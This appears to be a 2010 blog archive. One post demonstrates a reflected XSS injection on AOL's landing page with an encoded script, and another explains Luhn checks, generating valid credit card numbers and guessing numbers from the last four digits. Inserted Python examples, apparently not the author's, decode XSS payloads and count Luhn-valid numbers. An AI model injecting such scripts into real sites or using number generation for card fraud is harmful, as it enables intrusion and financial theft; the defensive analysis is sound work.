Thursday, August 26, 2010

Attack demonstration of XSS hole in AOL's personalized email landing page

Here's my video about exploiting cross-site scripting attacks in the wild. I found a hole in AOL's promotion page and had my video playing on their domain in less than 5 min.

See the attack and video live on the page

or watch below (I'll have this link live as long as it works)

The JavaScript we inject is shown below

which url encodes to...,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3E

This is a demonstration of a live attack meant for educational purposes only... if you want to see it, my copy is here: AOL XSS attack landing page. If you are having issues with XSS attacks on your domain or would like help on securing your application, contact me, I'd love to help.

P.S. the tool I used to do string encoding is here
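As an added example (not the author's code and not AOL's page), here is a small Python helper a defender can run over request logs for a page like the one above: it decodes a reflected parameter the way the browser would, unpacks String.fromCharCode() lists so the real payload is readable, flags the usual XSS markers, and shows the HTML-escaped form the landing page should have reflected instead. The host, path and parameter name are constructed for the example, and the sample payload is the harmless textbook alert(1).

```python
import html
import json
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Matches the String.fromCharCode(...) trick used to hide a payload as digits.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")

# Strings a reviewer would not expect inside a reflected "name" parameter.
SUSPICIOUS = ("<script", "document.write", "eval(", "onerror=", "javascript:")

def decode_fromcharcode(js: str) -> str:
    """Replace each String.fromCharCode(...) call with the JS string it builds."""
    def repl(match):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        return json.dumps("".join(chr(c) for c in codes))  # keep it a JS literal
    return FROMCHARCODE.sub(repl, js)

def inspect_param(url: str, param: str) -> dict:
    """Decode one query parameter as a browser would and flag XSS markers."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    raw = query.get(param, [""])[0]              # parse_qs already URL-decodes once
    decoded = decode_fromcharcode(unquote(raw))  # unquote again for double-encoding
    hits = [marker for marker in SUSPICIOUS if marker in decoded.lower()]
    return {
        "raw": raw,
        "decoded": decoded,
        "suspicious": hits,
        # The fix for the landing page: HTML-escape before reflecting, so the
        # parameter renders as text instead of becoming markup.
        "safe_to_reflect": html.escape(raw, quote=True),
    }

# Constructed sample (hypothetical host): the harmless textbook payload,
# encoded with the same fromCharCode trick as the post's injection.
SAMPLE_URL = "http://promo.example.com/landing?name=" + quote(
    "<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>"
)

if __name__ == "__main__":
    print(json.dumps(inspect_param(SAMPLE_URL, "name"), indent=2))
```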

Friday, August 6, 2010

New SEO API - HTTP Redirect Chain Test lets you enumerate all the jumps

One of the things you should know about redirects and SEO is that only a 301 Moved Permanently counts as permanent, and if there is more than one redirect then the crawler will use the "weakest" code it saw... You can test the tool below and see how it behaves... after about 5 redirects GoogleBot will stop following them, so my script also cuts off around that point. You can put any URL you like below and it will show you the destination URL with any hops it makes in between.

To see the code and use the tool you need to be on the original post

You can see that this default one makes too many jumps and it cuts off, but let's talk about formats and how to use the API. It can return JSON or JSONP (requires attribution link) and will follow up to 6 redirects and return info about each leg of the journey.
This is a sample call. It takes 1 required parameter, url=, which is the URL to check, and an optional callback= parameter if you want a JSONP response (an object wrapped in a function as output).

OK here's the example API URL
and a sample output from its response... it has an original url, a destination and its status code, as well as an array called "chain" that holds each leg of the jump

I created this for use with the new version of SEO Site Tools but I'm releasing it publicly because I don't know of any other SEO APIs available that give this kind of result, so use the tool and I hope you find it useful. If you have questions bother me at one of my social profiles... I'm pretty sure there's hundreds now :)
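Added example (not the author's API code): a Python walk of a redirect chain that produces the same shape the post describes (original url, destination, status and a "chain" array), caps itself at 6 hops, stops on loops, and applies the "weakest code" remark as an assumption that a chain only counts as permanent when every hop was a 301 (or 308). It runs offline against a constructed fake web; a real HEAD request can be passed in as fetch.

```python
import json
from urllib.parse import urljoin

MAX_HOPS = 6                      # the API follows up to 6 redirects
REDIRECTS = {301, 302, 303, 307, 308}
PERMANENT = {301, 308}
# Constructed offline stand-in for the web: url -> (status, Location header).
FAKE_WEB = {
    "http://example.com/old": (301, "/interim"),
    "http://example.com/interim": (302, "http://www.example.com/new"),
    "http://www.example.com/new": (200, None),
    "http://example.com/loop-a": (301, "/loop-b"),
    "http://example.com/loop-b": (301, "/loop-a"),
}
for i in range(8):                # an 8-hop chain to exercise the cut-off
    FAKE_WEB[f"http://example.com/h{i}"] = (301, f"/h{i + 1}")

def fake_fetch(url):
    return FAKE_WEB.get(url, (404, None))   # a real fetcher returns the same pair

def redirect_chain(url, fetch=fake_fetch, max_hops=MAX_HOPS):
    """Walk the redirects hop by hop and build the API's response shape."""
    chain, seen, current = [], set(), url
    cut_off = loop = False
    while True:
        status, location = fetch(current)
        chain.append({"url": current, "status": status, "location": location})
        if status not in REDIRECTS or not location:
            break                 # final destination (or an error page)
        if len(chain) >= max_hops:
            cut_off = True        # stop where GoogleBot would give up
            break
        seen.add(current)
        nxt = urljoin(current, location)   # Location may be relative
        if nxt in seen:
            loop = True           # redirect loop, never resolves
            break
        current = nxt
    hops = [leg["status"] for leg in chain if leg["status"] in REDIRECTS]
    # Assumption for the "weakest code" rule: permanent only if every hop was 301/308.
    effective = None if not hops else (301 if all(s in PERMANENT for s in hops) else 302)
    return {"url": url, "destination": chain[-1]["url"], "status": chain[-1]["status"],
            "effective_redirect": effective, "hops": len(hops),
            "cut_off": cut_off, "loop": loop, "chain": chain}

def to_json(result, callback=None):
    """Plain JSON, or JSONP (the object wrapped in a function call) if asked."""
    body = json.dumps(result)
    return f"{callback}({body});" if callback else body
```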

Wednesday, August 4, 2010

My postmortem of Google Wave... why I believe that great new Wave failed

OK so here's the news:

  • Google Killing 'Wave' Over Lack of Interest? (New Zealand Herald; Wall Street Journal)
    By SCOTT MORRISON, SAN FRANCISCO: Google Inc. said Wednesday it is pulling the plug on its "Google Wave" collaborative messaging service due to a lack of user ...
I believe this video is a good point for why it had a rough start... first they released their 90 min video to try and explain the very powerful yet complicated idea, and it was just too big for people to understand the implications of what they were saying. I was begging, pleading, trying to find someone that could hook me up with an invite; remember they decided to release it like Gmail, where it was once again the ability to see an exclusive preview into the genius. Like the idea to rewrite the internet with today's knowledge, they had reinvented email and fixed our problems: we could update photo galleries with multiple people on our blog in real time with edits going straight to the web. Rosie the translator bot, which promised that globalization would continue even faster, was missing in the release. I mean now Chrome auto-translates for me, but then where is the inline translator so I can leave my comments in broken French or whatever? Yes, you could argue I should just use their API and write it, but there's only so much open source code you can write (j/k I don't write that much open source code but I'm making the effort to release more and be open with my cool new ideas). But I'm rambling a little with this stream of consciousness post so let's hit a couple more points.

So it can make collaboration on a document a breeze and provide a reviewable history with branches for all versions. But it's like three things, and all I remember is how complicated it was... I mean it's a protocol, it's open, it can practically do magic. Here are starts at some of my work on Wave; I was trying to create an Othello-like game... it was a game that changed over time greatly and was also based on a board like chess, so I thought it would be neat to be able to replay the games. Alas, I gave up after trying to get the styles to behave correctly and understand how to control state in the wave.

And here is another example of one of the few times I ever used Wave... pretty dull convo so I don't think there's any harm in sharing. It was cool to see real-time typing but all the bubbles and changes all got caught up. I really think there's a specific type of job Wave is good for, and it isn't really this realtime typing as they first pitched it. People are only writing all over something at the same time if it's a get well soon card. All the other time we are reviewing the edits and trying to make our own, so them pushing it as going realtime was the wrong idea (in my opinion, well this whole article is I guess). Its history makes seeing and reviewing these edits easy; its power isn't in realtime.

Its flow was too bad... now for collaborative document editing I think it's a thing of beauty and I even recommend it if people are all trying to work on website copy. I mean the uses that are listed in this original video are incredible...
I never thought that key by key would be so fast over the wire... but I still feel it was sluggish... not because of the network but the speed of JavaScript rendering and rebuilding the DOM tree... with Chrome it's all gotten much faster, but when it was all first starting and there was a free-for-all on public waves you saw the scalability fail... there was just too much in the documents and they had to lock them down. The version I'm playing with now is much more polished and looks like they got a UI designer in there just a little too late. But there were other things... it needed adoption by a large community of developers for it to grow. The potential for games is so cool because it saves the entire history, so things like chess are very cool... but it was trivial to cheat and I could just tear open the JavaScript and find the answers to the puzzles saved in the state info.

So will we ever pick it back up in the future? I have no idea... I really think it was cool but the technology just isn't there yet for doing the type of realtime stuff they were first demonstrating. I really think it's an awesome product and it's sad that its adoption was so slow they had to kill it. I'd love to hear your opinions, add them below or bother me on Twitter at @cartercole

Your credit cards cannot be found by your last 4... and how I learned to generate valid credit card numbers

So I thought to myself the other day: if there is a checksum on credit cards and we know the type of card and the last 4 that are left on a receipt, can we find a small number of valid cards and figure out YOUR number? Now I'm not a crypto math guy so I knew people must have already handled this... I was right, and I found a cool optimized Luhn function so I could check a million numbers in about 3 sec.

OK so let's first talk about where all those numbers come from, what we can assume about them and why it doesn't mean a damn thing. Here's a valid cc number I generated at random and what we know from it:

[Image: the generated card number with its digit groups labelled "Bank Id", "On receipt" and "Check Digit"]

I learned the first 6 digits are a bank id, and after digging around awhile I made this fusion table public to hold the data. It's way cool cuz now we can look up what type of card it is and where it came from... I don't know why we ever ask debit or credit. So then I learned how the checksum works and got this optimized version of the Luhn checksum algorithm, or mod 10 as it's sometimes called, because after you do this little trick you look to see if the number is evenly divisible by 10.
Because of the way this works it turns out that for a million numbers there are about 100k valid numbers in that bunch. So wrapping this up, I found that there are tons of numbers and it's trivial to make valid ones, and they only work if you have the expiration date, so I deem the numbers are safe for now...
I'll release some code on how you can use the fusion table to look up a card's bank and origin later

Oh and here's 100k valid cc numbers :)
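Added example (not the author's optimized function): a plain Python Luhn check, the check-digit derivation, and a brute-force count over unknown digit positions, which shows why knowing the bank id and the last 4 still leaves a tenth of all candidates valid, the post's "about 100k per million". The test number and the mask are constructed inputs.

```python
from itertools import product

def luhn_sum(number: str) -> int:
    """The mod-10 trick: double every second digit from the right, subtract 9
    from any result above 9, then add everything up."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total

def luhn_valid(number: str) -> bool:
    """A number passes when the Luhn sum is evenly divisible by 10."""
    return number.isdigit() and luhn_sum(number) % 10 == 0

def luhn_check_digit(partial: str) -> str:
    """The final digit that makes `partial` + digit pass the check."""
    return str((10 - luhn_sum(partial + "0") % 10) % 10)

def count_luhn_valid(mask: str) -> int:
    """Count the fillings of the '?' positions in `mask` that pass Luhn.
    With a 16-digit card, a known 6-digit bank id and the 4 digits on the
    receipt, 6 positions are unknown: 10**6 candidates, of which exactly
    10**5 pass, because the check digit fixes one digit given the rest."""
    free = [i for i, c in enumerate(mask) if c == "?"]
    valid = 0
    for fill in product("0123456789", repeat=len(free)):
        digits = list(mask)
        for pos, d in zip(free, fill):
            digits[pos] = d
        valid += luhn_valid("".join(digits))
    return valid

# Constructed inputs: the well-known Visa test number and a mask with two
# unknown digits (100 candidates), small enough to brute-force instantly.
TEST_NUMBER = "4111111111111111"
TEST_MASK = "4111??1111111111"
```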

Tuesday, August 3, 2010

Get Facebook Insights about your domain! Now not just fan page stats...

I was dinking around with the Facebook Graph API and Facebook Connect and saw there are updated Insights pages now... I've seen my weekly stats for my fan page but then I saw a little button to add a domain.

Here's the tag I threw in my <head> tag...

And that's all it took... I added both my root and subdomains because it lists as "all pages under" and I didn't add the www, so here's a peek at stats about likes and shares as well as demographics if you get enough clout...

I never knew this had been rolled out, so if you're trying to monitor your social reach on your site you definitely need to create your fan page and verify ownership of your domain on Insights

Facebook Insights: add your domain today!